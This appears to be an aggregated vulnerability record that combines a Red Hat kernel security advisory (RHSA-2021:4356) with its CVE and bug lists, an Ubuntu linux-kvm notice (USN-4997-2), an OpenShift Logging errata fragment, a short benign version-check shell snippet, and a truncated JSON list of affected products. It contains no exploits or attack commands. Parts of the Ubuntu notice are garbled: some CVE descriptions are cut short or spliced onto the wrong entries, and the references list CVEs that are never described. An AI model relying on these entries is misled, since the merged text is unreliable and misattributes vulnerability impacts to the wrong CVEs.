Synopsis: Moderate: kernel security, bug fix, and enhancement update Advisory ID: RHSA-2021:4356-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2021:4356 Issue date: 2021-11-09 CVE Names: CVE-2020-0427 CVE-2020-24502 CVE-2020-24503 CVE-2020-24504 CVE-2020-24586 CVE-2020-24587 CVE-2020-24588 CVE-2020-26139 CVE-2020-26140 CVE-2020-26141 CVE-2020-26143 CVE-2020-26144 CVE-2020-26145 CVE-2020-26146 CVE-2020-26147 CVE-2020-27777 CVE-2020-29368 CVE-2020-29660 CVE-2020-36158 CVE-2020-36386 CVE-2021-0129 CVE-2021-3348 CVE-2021-3489 CVE-2021-3564 CVE-2021-3573 CVE-2021-3600 CVE-2021-3635 CVE-2021-3659 CVE-2021-3679 CVE-2021-3732 CVE-2021-20194 CVE-2021-20239 CVE-2021-23133 CVE-2021-28950 CVE-2021-28971 CVE-2021-29155 CVE-2021-29646 CVE-2021-29650 CVE-2021-31440 CVE-2021-31829 CVE-2021-31916 CVE-2021-33200 ==================================================================== 1.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64 Red Hat Enterprise Linux CRB (v. 8) - aarch64, ppc64le, x86_64
Security Fix(es): * kernel: out-of-bounds reads in pinctrl subsystem (CVE-2020-0427) * kernel: Improper input validation in some Intel(R) Ethernet E810 Adapter drivers (CVE-2020-24502) * kernel: Insufficient access control in some Intel(R) Ethernet E810 Adapter drivers (CVE-2020-24503) * kernel: Uncontrolled resource consumption in some Intel(R) Ethernet E810 Adapter drivers (CVE-2020-24504) * kernel: Fragmentation cache not cleared on reconnection (CVE-2020-24586) * kernel: Reassembling fragments encrypted under different keys (CVE-2020-24587) * kernel: wifi frame payload being parsed incorrectly as an L2 frame (CVE-2020-24588) * kernel: Forwarding EAPOL from unauthenticated wifi client (CVE-2020-26139) * kernel: accepting plaintext data frames in protected networks (CVE-2020-26140) * kernel: not verifying TKIP MIC of fragmented frames (CVE-2020-26141) * kernel: accepting fragmented plaintext frames in protected networks (CVE-2020-26143) * kernel: accepting unencrypted A-MSDU frames that start with RFC1042 header (CVE-2020-26144) * kernel: accepting plaintext broadcast fragments as full frames (CVE-2020-26145) * kernel: powerpc: RTAS calls can be used to compromise kernel integrity (CVE-2020-27777) * kernel: locking inconsistency in tty_io.c and tty_jobctrl.c can lead to a read-after-free (CVE-2020-29660) * kernel: buffer overflow in mwifiex_cmd_802_11_ad_hoc_start function via a long SSID value (CVE-2020-36158) * kernel: slab out-of-bounds read in hci_extended_inquiry_result_evt() (CVE-2020-36386) * kernel: Improper access control in BlueZ may allow information disclosure vulnerability. 
(CVE-2021-0129) * kernel: Use-after-free in ndb_queue_rq() in drivers/block/nbd.c (CVE-2021-3348) * kernel: Linux kernel eBPF RINGBUF map oversized allocation (CVE-2021-3489) * kernel: double free in bluetooth subsystem when the HCI device initialization fails (CVE-2021-3564) * kernel: use-after-free in function hci_sock_bound_ioctl() (CVE-2021-3573) * kernel: eBPF 32-bit source register truncation on div/mod (CVE-2021-3600) * kernel: DoS in rb_per_cpu_empty() (CVE-2021-3679) * kernel: Mounting overlayfs inside an unprivileged user namespace can reveal files (CVE-2021-3732) * kernel: heap overflow in __cgroup_bpf_run_filter_getsockopt() (CVE-2021-20194) * kernel: Race condition in sctp_destroy_sock list_del (CVE-2021-23133) * kernel: fuse: stall on CPU can occur because a retry loop continually finds the same bad inode (CVE-2021-28950) * kernel: System crash in intel_pmu_drain_pebs_nhm in arch/x86/events/intel/ds.c (CVE-2021-28971) * kernel: protection can be bypassed to leak content of kernel memory (CVE-2021-29155) * kernel: improper input validation in tipc_nl_retrieve_key function in net/tipc/node.c (CVE-2021-29646) * kernel: lack a full memory barrier may lead to DoS (CVE-2021-29650) * kernel: local escalation of privileges in handling of eBPF programs (CVE-2021-31440) * kernel: protection of stack pointer against speculative pointer arithmetic can be bypassed to leak content of kernel memory (CVE-2021-31829) * kernel: out-of-bounds reads and writes due to enforcing incorrect limits for pointer arithmetic operations by BPF verifier (CVE-2021-33200) * kernel: reassembling encrypted fragments with non-consecutive packet numbers (CVE-2020-26146) * kernel: reassembling mixed encrypted/plaintext fragments (CVE-2020-26147) * kernel: the copy-on-write implementation can grant unintended write access because of a race condition in a THP mapcount check (CVE-2020-29368) * kernel: flowtable list del corruption with kernel BUG at lib/list_debug.c:50 (CVE-2021-3635) * 
kernel: NULL pointer dereference in llsec_key_alloc() in net/mac802154/llsec.c (CVE-2021-3659) * kernel: setsockopt System Call Untrusted Pointer Dereference Information Disclosure (CVE-2021-20239) * kernel: out of bounds array access in drivers/md/dm-ioctl.c (CVE-2021-31916)
- Solution:
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Additional Changes:
For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.5 Release Notes linked from the References section.
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
The system must be rebooted for this update to take effect.
- Bugs fixed (https://bugzilla.redhat.com/):
1509204 - dlm: Add ability to set SO_MARK on DLM sockets
1793880 - Unreliable RTC synchronization (11-minute mode)
1816493 - [RHEL 8.3] Discard request from mkfs.xfs takes too much time on raid10
1900844 - CVE-2020-27777 kernel: powerpc: RTAS calls can be used to compromise kernel integrity
1903244 - CVE-2020-29368 kernel: the copy-on-write implementation can grant unintended write access because of a race condition in a THP mapcount check
1906522 - CVE-2020-29660 kernel: locking inconsistency in drivers/tty/tty_io.c and drivers/tty/tty_jobctrl.c can lead to a read-after-free
1912683 - CVE-2021-20194 kernel: heap overflow in __cgroup_bpf_run_filter_getsockopt()
1913348 - CVE-2020-36158 kernel: buffer overflow in mwifiex_cmd_802_11_ad_hoc_start function in drivers/net/wireless/marvell/mwifiex/join.c via a long SSID value
1915825 - Allow falling back to genfscon labeling when the FS doesn't support xattrs and there is a fs_use_xattr rule for it
1919893 - CVE-2020-0427 kernel: out-of-bounds reads in pinctrl subsystem.
1921958 - CVE-2021-3348 kernel: Use-after-free in ndb_queue_rq() in drivers/block/nbd.c
1923636 - CVE-2021-20239 kernel: setsockopt System Call Untrusted Pointer Dereference Information Disclosure
1930376 - CVE-2020-24504 kernel: Uncontrolled resource consumption in some Intel(R) Ethernet E810 Adapter drivers
1930379 - CVE-2020-24502 kernel: Improper input validation in some Intel(R) Ethernet E810 Adapter drivers
1930381 - CVE-2020-24503 kernel: Insufficient access control in some Intel(R) Ethernet E810 Adapter drivers
1933527 - Files on cifs mount can get mixed contents when underlying file is removed but inode number is reused, when mounted with 'serverino' and 'cache=strict '
1939341 - CNB: net: add inline function skb_csum_is_sctp
1941762 - CVE-2021-28950 kernel: fuse: stall on CPU can occur because a retry loop continually finds the same bad inode
1941784 - CVE-2021-28971 kernel: System crash in intel_pmu_drain_pebs_nhm in arch/x86/events/intel/ds.c
1945345 - CVE-2021-29646 kernel: improper input validation in tipc_nl_retrieve_key function in net/tipc/node.c
1945388 - CVE-2021-29650 kernel: lack a full memory barrier upon the assignment of a new table value in net/netfilter/x_tables.c and include/linux/netfilter/x_tables.h may lead to DoS
1946965 - CVE-2021-31916 kernel: out of bounds array access in drivers/md/dm-ioctl.c
1948772 - CVE-2021-23133 kernel: Race condition in sctp_destroy_sock list_del
1951595 - CVE-2021-29155 kernel: protection for sequences of pointer arithmetic operations against speculatively out-of-bounds loads can be bypassed to leak content of kernel memory
1953847 - [ethtool] The NLM_F_MULTI should be used for NLM_F_DUMP
1954588 - RHEL kernel 8.2 and higher are affected by data corruption bug in raid1 arrays using bitmaps.
1957788 - CVE-2021-31829 kernel: protection of stack pointer against speculative pointer arithmetic can be bypassed to leak content of kernel memory
1959559 - CVE-2021-3489 kernel: Linux kernel eBPF RINGBUF map oversized allocation
1959642 - CVE-2020-24586 kernel: Fragmentation cache not cleared on reconnection
1959654 - CVE-2020-24587 kernel: Reassembling fragments encrypted under different keys
1959657 - CVE-2020-24588 kernel: wifi frame payload being parsed incorrectly as an L2 frame
1959663 - CVE-2020-26139 kernel: Forwarding EAPOL from unauthenticated wifi client
1960490 - CVE-2020-26140 kernel: accepting plaintext data frames in protected networks
1960492 - CVE-2020-26141 kernel: not verifying TKIP MIC of fragmented frames
1960496 - CVE-2020-26143 kernel: accepting fragmented plaintext frames in protected networks
1960498 - CVE-2020-26144 kernel: accepting unencrypted A-MSDU frames that start with RFC1042 header
1960500 - CVE-2020-26145 kernel: accepting plaintext broadcast fragments as full frames
1960502 - CVE-2020-26146 kernel: reassembling encrypted fragments with non-consecutive packet numbers
1960504 - CVE-2020-26147 kernel: reassembling mixed encrypted/plaintext fragments
1960708 - please add CAP_CHECKPOINT_RESTORE to capability.h
1964028 - CVE-2021-31440 kernel: local escalation of privileges in handling of eBPF programs
1964139 - CVE-2021-3564 kernel: double free in bluetooth subsystem when the HCI device initialization fails
1965038 - CVE-2021-0129 kernel: Improper access control in BlueZ may allow information disclosure vulnerability.
1965360 - kernel: get_timespec64 does not ignore padding in compat syscalls
1965458 - CVE-2021-33200 kernel: out-of-bounds reads and writes due to enforcing incorrect limits for pointer arithmetic operations by BPF verifier
1966578 - CVE-2021-3573 kernel: use-after-free in function hci_sock_bound_ioctl()
1969489 - CVE-2020-36386 kernel: slab out-of-bounds read in hci_extended_inquiry_result_evt() in net/bluetooth/hci_event.c
1971101 - ceph: potential data corruption in cephfs write_begin codepath
1972278 - libceph: allow addrvecs with a single NONE/blank address
1974627 - [TIPC] kernel BUG at lib/list_debug.c:31!
1975182 - CVE-2021-33909 kernel: size_t-to-int conversion vulnerability in the filesystem layer [rhel-8.5.0]
1975949 - CVE-2021-3659 kernel: NULL pointer dereference in llsec_key_alloc() in net/mac802154/llsec.c
1976679 - blk-mq: fix/improve io scheduler batching dispatch
1976699 - [SCTP]WARNING: CPU: 29 PID: 3165 at mm/page_alloc.c:4579 __alloc_pages_slowpath+0xb74/0xd00
1976946 - CVE-2021-3635 kernel: flowtable list del corruption with kernel BUG at lib/list_debug.c:50
1976969 - XFS: followup to XFS sync to upstream v5.10 (re BZ1937116)
1977162 - [XDP] test program warning: libbpf: elf: skipping unrecognized data section(16) .eh_frame
1977422 - Missing backport of IMA boot aggregate calculation in rhel 8.4 kernel
1977537 - RHEL8.5: Update the kernel workqueue code to v5.12 level
1977850 - geneve virtual devices lack the NETIF_F_FRAGLIST feature
1978369 - dm writecache: sync with upstream 5.14
1979070 - Inaccessible NFS server overloads clients (native_queued_spin_lock_slowpath connotation?)
1979680 - Backport openvswitch tracepoints
1981954 - CVE-2021-3600 kernel: eBPF 32-bit source register truncation on div/mod
1986138 - Lockd invalid cast to nlm_lockowner
1989165 - CVE-2021-3679 kernel: DoS in rb_per_cpu_empty()
1989999 - ceph omnibus backport for RHEL-8.5.0
1991976 - block: fix New warning in nvme_setup_discard
1992700 - blk-mq: fix kernel panic when iterating over flush request
1995249 - CVE-2021-3732 kernel: overlayfs: Mounting overlayfs inside an unprivileged user namespace can reveal files
1996854 - dm crypt: Avoid percpu_counter spinlock contention in crypt_page_alloc()
- Package List:
Red Hat Enterprise Linux BaseOS (v. 8):
Source: kernel-4.18.0-348.el8.src.rpm
aarch64: bpftool-4.18.0-348.el8.aarch64.rpm bpftool-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-4.18.0-348.el8.aarch64.rpm kernel-core-4.18.0-348.el8.aarch64.rpm kernel-cross-headers-4.18.0-348.el8.aarch64.rpm kernel-debug-4.18.0-348.el8.aarch64.rpm kernel-debug-core-4.18.0-348.el8.aarch64.rpm kernel-debug-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-debug-devel-4.18.0-348.el8.aarch64.rpm kernel-debug-modules-4.18.0-348.el8.aarch64.rpm kernel-debug-modules-extra-4.18.0-348.el8.aarch64.rpm kernel-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-debuginfo-common-aarch64-4.18.0-348.el8.aarch64.rpm kernel-devel-4.18.0-348.el8.aarch64.rpm kernel-headers-4.18.0-348.el8.aarch64.rpm kernel-modules-4.18.0-348.el8.aarch64.rpm kernel-modules-extra-4.18.0-348.el8.aarch64.rpm kernel-tools-4.18.0-348.el8.aarch64.rpm kernel-tools-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-tools-libs-4.18.0-348.el8.aarch64.rpm perf-4.18.0-348.el8.aarch64.rpm perf-debuginfo-4.18.0-348.el8.aarch64.rpm python3-perf-4.18.0-348.el8.aarch64.rpm python3-perf-debuginfo-4.18.0-348.el8.aarch64.rpm
noarch: kernel-abi-stablelists-4.18.0-348.el8.noarch.rpm kernel-doc-4.18.0-348.el8.noarch.rpm
ppc64le: bpftool-4.18.0-348.el8.ppc64le.rpm bpftool-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-4.18.0-348.el8.ppc64le.rpm kernel-core-4.18.0-348.el8.ppc64le.rpm kernel-cross-headers-4.18.0-348.el8.ppc64le.rpm kernel-debug-4.18.0-348.el8.ppc64le.rpm kernel-debug-core-4.18.0-348.el8.ppc64le.rpm kernel-debug-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-debug-devel-4.18.0-348.el8.ppc64le.rpm kernel-debug-modules-4.18.0-348.el8.ppc64le.rpm kernel-debug-modules-extra-4.18.0-348.el8.ppc64le.rpm kernel-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-debuginfo-common-ppc64le-4.18.0-348.el8.ppc64le.rpm kernel-devel-4.18.0-348.el8.ppc64le.rpm kernel-headers-4.18.0-348.el8.ppc64le.rpm kernel-modules-4.18.0-348.el8.ppc64le.rpm kernel-modules-extra-4.18.0-348.el8.ppc64le.rpm kernel-tools-4.18.0-348.el8.ppc64le.rpm kernel-tools-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-tools-libs-4.18.0-348.el8.ppc64le.rpm perf-4.18.0-348.el8.ppc64le.rpm perf-debuginfo-4.18.0-348.el8.ppc64le.rpm python3-perf-4.18.0-348.el8.ppc64le.rpm python3-perf-debuginfo-4.18.0-348.el8.ppc64le.rpm
s390x: bpftool-4.18.0-348.el8.s390x.rpm bpftool-debuginfo-4.18.0-348.el8.s390x.rpm kernel-4.18.0-348.el8.s390x.rpm kernel-core-4.18.0-348.el8.s390x.rpm kernel-cross-headers-4.18.0-348.el8.s390x.rpm kernel-debug-4.18.0-348.el8.s390x.rpm kernel-debug-core-4.18.0-348.el8.s390x.rpm kernel-debug-debuginfo-4.18.0-348.el8.s390x.rpm kernel-debug-devel-4.18.0-348.el8.s390x.rpm kernel-debug-modules-4.18.0-348.el8.s390x.rpm kernel-debug-modules-extra-4.18.0-348.el8.s390x.rpm kernel-debuginfo-4.18.0-348.el8.s390x.rpm kernel-debuginfo-common-s390x-4.18.0-348.el8.s390x.rpm kernel-devel-4.18.0-348.el8.s390x.rpm kernel-headers-4.18.0-348.el8.s390x.rpm kernel-modules-4.18.0-348.el8.s390x.rpm kernel-modules-extra-4.18.0-348.el8.s390x.rpm kernel-tools-4.18.0-348.el8.s390x.rpm kernel-tools-debuginfo-4.18.0-348.el8.s390x.rpm kernel-zfcpdump-4.18.0-348.el8.s390x.rpm kernel-zfcpdump-core-4.18.0-348.el8.s390x.rpm kernel-zfcpdump-debuginfo-4.18.0-348.el8.s390x.rpm kernel-zfcpdump-devel-4.18.0-348.el8.s390x.rpm kernel-zfcpdump-modules-4.18.0-348.el8.s390x.rpm kernel-zfcpdump-modules-extra-4.18.0-348.el8.s390x.rpm perf-4.18.0-348.el8.s390x.rpm perf-debuginfo-4.18.0-348.el8.s390x.rpm python3-perf-4.18.0-348.el8.s390x.rpm python3-perf-debuginfo-4.18.0-348.el8.s390x.rpm
x86_64: bpftool-4.18.0-348.el8.x86_64.rpm bpftool-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-4.18.0-348.el8.x86_64.rpm kernel-core-4.18.0-348.el8.x86_64.rpm kernel-cross-headers-4.18.0-348.el8.x86_64.rpm kernel-debug-4.18.0-348.el8.x86_64.rpm kernel-debug-core-4.18.0-348.el8.x86_64.rpm kernel-debug-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-debug-devel-4.18.0-348.el8.x86_64.rpm kernel-debug-modules-4.18.0-348.el8.x86_64.rpm kernel-debug-modules-extra-4.18.0-348.el8.x86_64.rpm kernel-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-debuginfo-common-x86_64-4.18.0-348.el8.x86_64.rpm kernel-devel-4.18.0-348.el8.x86_64.rpm kernel-headers-4.18.0-348.el8.x86_64.rpm kernel-modules-4.18.0-348.el8.x86_64.rpm kernel-modules-extra-4.18.0-348.el8.x86_64.rpm kernel-tools-4.18.0-348.el8.x86_64.rpm kernel-tools-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-tools-libs-4.18.0-348.el8.x86_64.rpm perf-4.18.0-348.el8.x86_64.rpm perf-debuginfo-4.18.0-348.el8.x86_64.rpm python3-perf-4.18.0-348.el8.x86_64.rpm python3-perf-debuginfo-4.18.0-348.el8.x86_64.rpm
Red Hat Enterprise Linux CRB (v. 8):
aarch64: bpftool-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-debug-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-debuginfo-common-aarch64-4.18.0-348.el8.aarch64.rpm kernel-tools-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-tools-libs-devel-4.18.0-348.el8.aarch64.rpm perf-debuginfo-4.18.0-348.el8.aarch64.rpm python3-perf-debuginfo-4.18.0-348.el8.aarch64.rpm
ppc64le: bpftool-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-debug-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-debuginfo-common-ppc64le-4.18.0-348.el8.ppc64le.rpm kernel-tools-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-tools-libs-devel-4.18.0-348.el8.ppc64le.rpm perf-debuginfo-4.18.0-348.el8.ppc64le.rpm python3-perf-debuginfo-4.18.0-348.el8.ppc64le.rpm
x86_64: bpftool-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-debug-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-debuginfo-common-x86_64-4.18.0-348.el8.x86_64.rpm kernel-tools-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-tools-libs-devel-4.18.0-348.el8.x86_64.rpm perf-debuginfo-4.18.0-348.el8.x86_64.rpm python3-perf-debuginfo-4.18.0-348.el8.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2021 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBYYrdRdzjgjWX9erEAQhs0w//as9X4T+FCf3TAbcNIStxlOK6fbJoAlST FrgNJnRH3RmT+VxRSLWZcsJQf78kudeJWtMezbGSVREfhCMBCGhKZ7mvVp5P7J8l bobmdaap3hqkPqq66VuKxGuS+6j0rXXgGQH034yzoX+L/lx6KV9qdAnZZO+7kWcy SfX0GkLg0ARDMfsoUKwVmeUeNLhPlJ4ZH2rBdZ4FhjyEAG/5yL9JwU/VNReWHjhW HgarTuSnFR3vLQDKyjMIEEiBPOI162hS2j3Ba/A/1hJ70HOjloJnd0eWYGxSuIfC DRrzlacFNAzBPZsbRFi1plXrHh5LtNoBBWjl+xyb6jRsB8eXgS+WhzUhOXGUv01E lJTwFy5Kz71d+cAhRXgmz5gVgWuoNJw8AEImefWcy4n0EEK55vdFe0Sl7BfZiwpD Jhx97He6OurNnLrYyJJ0+TsU1L33794Ag2AJZnN1PLFUyrKKNlD1ZWtdsJg99klK dQteUTnnUhgDG5Tqulf0wX19BEkLd/O6CRyGueJcV4h4PFpSoWOh5Yy/BlokFzc8 zf14PjuVueIodaIUXtK+70Zmw7tg09Dx5Asyfuk5hWFPYv856nHlDn7PT724CU8v 1cp96h1IjLR6cF17NO2JCcbU0XZEW+aCkGkPcsY8DhBmaZqxUxXObvTD80Mm7EvN +PuV5cms0sE=2UUA -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . ========================================================================== Ubuntu Security Notice USN-4997-2 June 25, 2021
linux-kvm vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 21.04
Summary:
Several security issues were fixed in the Linux kernel.
Software Description: - linux-kvm: Linux kernel for cloud environments
Details:
USN-4997-1 fixed vulnerabilities in the Linux kernel for Ubuntu 21.04. This update provides the corresponding updates for the Linux KVM kernel for Ubuntu 21.04. A local attacker could use this issue to execute arbitrary code. (CVE-2021-3609)
Piotr Krysiuk discovered that the eBPF implementation in the Linux kernel did not properly enforce limits for pointer operations. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-33200)
Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation did not properly clear received fragments from memory in some situations. A physically proximate attacker could possibly use this issue to inject packets or expose sensitive information. (CVE-2020-24586)
Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation incorrectly handled encrypted fragments. A physically proximate attacker could possibly use this issue to decrypt fragments. (CVE-2020-24587)
Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation incorrectly handled certain malformed frames. If a user were tricked into connecting to a malicious server, a physically proximate attacker could use this issue to inject packets. (CVE-2020-24588)
Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation incorrectly handled EAPOL frames from unauthenticated senders. A physically proximate attacker could inject malicious packets to cause a denial of service (system crash). (CVE-2020-26139)
Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation did not properly verify certain fragmented frames. A physically proximate attacker could possibly use this issue to inject or decrypt packets. (CVE-2020-26141)
Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation accepted plaintext fragments in certain situations. A physically proximate attacker could use this issue to inject packets. (CVE-2020-26145)
Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation could reassemble mixed encrypted and plaintext fragments. A physically proximate attacker could possibly use this issue to inject packets or exfiltrate selected fragments. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-23133)
Or Cohen and Nadav Markus discovered a use-after-free vulnerability in the nfc implementation in the Linux kernel. A privileged local attacker could use this issue to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-23134)
Manfred Paul discovered that the extended Berkeley Packet Filter (eBPF) implementation in the Linux kernel contained an out-of-bounds vulnerability. A local attacker could use this issue to execute arbitrary code. (CVE-2021-31440)
Piotr Krysiuk discovered that the eBPF implementation in the Linux kernel did not properly prevent speculative loads in certain situations. A local attacker could use this to expose sensitive information (kernel memory). An attacker could use this issue to possibly execute arbitrary code. (CVE-2021-32399)
It was discovered that a use-after-free existed in the Bluetooth HCI driver of the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-33034)
It was discovered that an out-of-bounds (OOB) memory access flaw existed in the f2fs module of the Linux kernel. A local attacker could use this issue to cause a denial of service (system crash). (CVE-2021-3506)
Mathias Krause discovered that a null pointer dereference existed in the Nitro Enclaves kernel driver of the Linux kernel. A local attacker could use this issue to cause a denial of service or possibly execute arbitrary code. (CVE-2021-3543)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 21.04: linux-image-5.11.0-1009-kvm 5.11.0-1009.9 linux-image-kvm 5.11.0.1009.9
After a standard system update you need to reboot your computer to make all the necessary changes.
ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well.
References: https://ubuntu.com/security/notices/USN-4997-2 https://ubuntu.com/security/notices/USN-4997-1 CVE-2020-24586, CVE-2020-24587, CVE-2020-24588, CVE-2020-26139, CVE-2020-26141, CVE-2020-26145, CVE-2020-26147, CVE-2021-23133, CVE-2021-23134, CVE-2021-31440, CVE-2021-31829, CVE-2021-32399, CVE-2021-33034, CVE-2021-33200, CVE-2021-3506, CVE-2021-3543, CVE-2021-3609
Package Information: https://launchpad.net/ubuntu/+source/linux-kvm/5.11.0-1009.9
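A quick way to check whether an installed kernel package already carries the fixed version from a notice like the one above is a dpkg-style version comparison; `sort -V` (GNU coreutils version sort) is enough for a sketch. The version strings below are taken from this notice; the helper name is made up for illustration:

```shell
# version_ge A B: succeed if version A is greater than or equal to B,
# using GNU sort's version ordering (-V).
version_ge() {
  [ "$(printf '%s\n%s\n' "$1" "$2" | sort -V | head -n1)" = "$2" ]
}

# Fixed package version from USN-4997-2 for Ubuntu 21.04 linux-kvm.
fixed="5.11.0-1009.9"

if version_ge "$fixed" "5.11.0-1009"; then
  echo "at or beyond the fixed version"
else
  echo "predates the fix; update and reboot"
fi
```

In practice you would feed `version_ge` the output of `dpkg-query -W -f='${Version}' linux-image-kvm` rather than a literal, and still reboot afterwards as the notice requires.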
. Solution:
For OpenShift Container Platform 4.9 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:
https://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html
For Red Hat OpenShift Logging 5.3, see the following instructions to apply this update:
https://docs.openshift.com/container-platform/4.7/logging/cluster-logging-upgrading.html
- Bugs fixed (https://bugzilla.redhat.com/):
1963232 - CVE-2021-33194 golang: x/net/html: infinite loop in ParseFragment
- JIRA issues fixed (https://issues.jboss.org/):
LOG-1168 - Disable hostname verification in syslog TLS settings
LOG-1235 - Using HTTPS without a secret does not translate into the correct 'scheme' value in Fluentd
LOG-1375 - ssl_ca_cert should be optional
LOG-1378 - CLO should support sasl_plaintext(Password over http)
LOG-1392 - In fluentd config, flush_interval can't be set with flush_mode=immediate
LOG-1494 - Syslog output is serializing json incorrectly
LOG-1555 - Fluentd logs emit transaction failed: error_class=NoMethodError while forwarding to external syslog server
LOG-1575 - Rejected by Elasticsearch and unexpected json-parsing
LOG-1735 - Regression introducing flush_at_shutdown
LOG-1774 - The collector logs should be excluded in fluent.conf
LOG-1776 - fluentd total_limit_size sets value beyond available space
LOG-1822 - OpenShift Alerting Rules Style-Guide Compliance
LOG-1859 - CLO Should not error and exit early on missing ca-bundle when cluster wide proxy is not enabled
LOG-1862 - Unsupported kafka parameters when enabled Kafka SASL
LOG-1903 - Fix the Display of ClusterLogging type in OLM
LOG-1911 - CLF API changes to Opt-in to multiline error detection
LOG-1918 - Alert FluentdNodeDown always firing
LOG-1939 - Opt-in multiline detection breaks cloudwatch forwarding
{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "kernel",
"scope": "gte",
"trust": 1.0,
"vendor": "linux",
"version": "5.5"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "33"
},
{
"_id": null,
"model": "kernel",
"scope": "gte",
"trust": 1.0,
"vendor": "linux",
"version": "4.15"
},
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "5.4.114"
},
{
"_id": null,
"model": "solidfire \\\u0026 hci management node",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "4.14.232"
},
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h300e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h700e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": "gte",
"trust": 1.0,
"vendor": "linux",
"version": "4.10"
},
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "5.10.32"
},
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "4.19.189"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "34"
},
{
"_id": null,
"model": "h410c",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "solidfire baseboard management controller",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "5.11.16"
},
{
"_id": null,
"model": "brocade fabric operating system",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": "gte",
"trust": 1.0,
"vendor": "linux",
"version": "5.11"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "32"
},
{
"_id": null,
"model": "h500e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "cloud backup",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
